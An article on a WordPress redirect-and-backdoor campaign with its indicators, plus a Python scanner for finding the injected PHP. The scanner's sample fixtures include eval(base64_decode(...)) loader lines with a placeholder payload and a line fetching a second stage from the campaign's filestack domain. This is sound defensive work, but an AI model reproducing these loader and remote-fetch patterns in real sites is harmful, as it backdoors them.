Researchers tracked a surge in WordPress malware during November 2022 that redirected website visitors to fake Q&A sites via ois[.]is. The campaign's end goal was black hat SEO: pushing traffic to the attacker's own sites to inflate their search reputation.
The researchers have now revealed that, since September, their SiteCheck remote scanner has detected this campaign on 10,890 infected sites. Activity has surged, with over 70 new malicious domains masquerading as URL shorteners.
Traffic from the hacked websites is redirected to low-quality sites running the Question2Answer CMS that host discussions about cryptocurrency and blockchain. The main motive of the campaign is to generate revenue from the redirected traffic.
The threat actors moved all their domains from Cloudflare to the Russian bulletproof hosting provider DDoS-Guard. All of these domains now resolve to the IP 190[.]115[.]26[.]9.
Unlike previous waves, this latest one also redirects through Bing search result URLs and through Twitter t.co short URLs such as t[.]co/Xa4ZRqsp8C and t[.]co/KgdLpz31TG. Bouncing visitors through reputable intermediaries means a simple allowlist of trusted domains will not break the redirect chain.
Analysis of the compromised WordPress sites revealed that the threat actors injected obfuscated backdoor PHP code to perform the traffic redirection and to keep their access.
The report concludes: "On some infected sites we also find a similarly obfuscated injection in files like wp-blog-header.php. Website backdoors to maintain unauthorized access. These backdoors download additional shells and a Leaf PHP mailer script from a remote domain filestack[.]live and place them in files with random names in wp-includes, wp-admin, and wp-content directories."
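The drop locations and loader traits named in the report translate directly into a triage check. The script below is an added example written for this page, not Sucuri's SiteCheck or any tooling from the report: it walks a WordPress tree, flags PHP files that reference the report's indicators (ois[.]is, filestack[.]live, 190[.]115[.]26[.]9, t[.]co links) or that combine eval/base64-style loader calls with a long encoded blob, and pays extra attention to wp-blog-header.php and random-named PHP files under wp-includes, wp-admin and wp-content. The sample site it builds, the placeholder payload and the "random name" heuristic are constructed assumptions for the example.

```python
"""Triage scanner for the injected-PHP pattern described in the report.

Constructed example: the heuristics, the sample site layout and the file
contents below are assumptions made for this page, not Sucuri's tooling or
the actual injected code.
"""
import os
import re
import tempfile

# Indicators of compromise taken from the report (brackets un-defanged so they
# match raw file contents).
IOC_PATTERNS = {
    "ois.is": re.compile(r"\bois\.is\b", re.IGNORECASE),
    "filestack.live": re.compile(r"\bfilestack\.live\b", re.IGNORECASE),
    "190.115.26.9": re.compile(r"\b190\.115\.26\.9\b"),
    "t.co short URL": re.compile(r"\bt\.co/[A-Za-z0-9]{6,}"),
}

# Loader primitives that almost always appear in obfuscated PHP injections.
OBFUSCATION = {
    name: re.compile(r"\b" + name + r"\s*\(")
    for name in ("eval", "base64_decode", "gzinflate", "gzuncompress", "str_rot13")
}
# A long run of base64-alphabet characters hints at an embedded encoded payload.
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")

# Directories the report names as drop locations, and the core loader it names.
TARGET_DIRS = {"wp-includes", "wp-admin", "wp-content"}
CORE_LOADERS = {"wp-blog-header.php"}
# "Random name" heuristic (assumption): 8+ lowercase alphanumerics mixing letters and digits.
RANDOM_NAME = re.compile(r"^(?=.*[0-9])(?=.*[a-z])[a-z0-9]{8,}\.php$")


def scan_file(path, root):
    """Return the list of reasons a file is suspicious (empty list means clean)."""
    with open(path, "rb") as fh:
        data = fh.read().decode("utf-8", errors="replace")
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    top_dir = rel.split("/")[0]
    base = os.path.basename(path)

    reasons = ["ioc:" + name for name, pat in IOC_PATTERNS.items() if pat.search(data)]
    obf_hits = [name for name, pat in OBFUSCATION.items() if pat.search(data)]
    long_b64 = LONG_BASE64.search(data) is not None

    # A single base64_decode() is common in legitimate plugins; require a
    # combination of signals before calling a file an obfuscated loader.
    if len(obf_hits) >= 2 or (obf_hits and long_b64):
        reasons.append("obfuscated-loader:" + ",".join(obf_hits))
    if top_dir in TARGET_DIRS and RANDOM_NAME.match(base) and (obf_hits or long_b64):
        reasons.append("random-named-php-in-" + top_dir)
    # wp-blog-header.php at the document root only loads wp-load.php and the
    # template loader; eval/base64 or an encoded blob there is suspicious alone.
    if base in CORE_LOADERS and top_dir == base and (obf_hits or long_b64):
        reasons.append("core-loader-injected")
    return reasons


def scan_tree(root):
    """Walk a WordPress document root; return {relative path: reasons} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):  # extend for .ico/.txt droppers if needed
                continue
            path = os.path.join(dirpath, name)
            reasons = scan_file(path, root)
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings


def build_sample_site():
    """Create a throwaway directory mimicking a partially infected install.

    Everything here is constructed for the example; the 'payload' is a
    placeholder base64 string (it decodes to 'ABCDEF' repeated), not real malware.
    """
    root = tempfile.mkdtemp(prefix="wp-sample-")
    fake_payload = "QUJDREVG" * 20  # 160 base64 characters
    files = {
        # Clean core admin entry point: must not be flagged.
        "wp-admin/admin.php":
            "<?php\nrequire_once __DIR__ . '/../wp-load.php';\n",
        # Legitimate-looking plugin with one base64_decode(): must not be flagged.
        "wp-content/plugins/akismet/akismet.php":
            "<?php\n/* Plugin Name: Akismet */\n$key = base64_decode(get_option('akismet_key'));\n",
        # Core loader with an obfuscated eval() injection prepended.
        "wp-blog-header.php":
            "<?php eval(base64_decode('" + fake_payload + "'));\n"
            "if ( ! isset( $wp_did_header ) ) {\n\t$wp_did_header = true;\n"
            "\trequire_once __DIR__ . '/wp-load.php';\n\twp();\n"
            "\trequire_once ABSPATH . WPINC . '/template-loader.php';\n}\n",
        # Random-named dropper in wp-includes.
        "wp-includes/k9x2m4v7q1.php":
            "<?php $c = gzinflate(base64_decode('" + fake_payload + "')); eval($c);\n",
        # Theme file fetching a second stage from the report's download domain.
        "wp-content/themes/twentytwenty/header.php":
            "<?php $stage2 = file_get_contents('http://filestack.live/');\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, why in sorted(scan_tree(site).items()):
        print(rel, "->", ", ".join(why))
```

Point it at a real document root with scan_tree("/var/www/html") and treat hits as leads, not verdicts: compare flagged core files against a clean copy (WP-CLI's wp core verify-checksums does this for core) and review plugin hits by hand, since legitimate plugins do occasionally call base64_decode.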
Site owners are advised to keep WordPress core, themes and plugins updated, enable 2FA on administrator accounts, and place their sites behind a web application firewall.
This research was documented by researchers from Sucuri.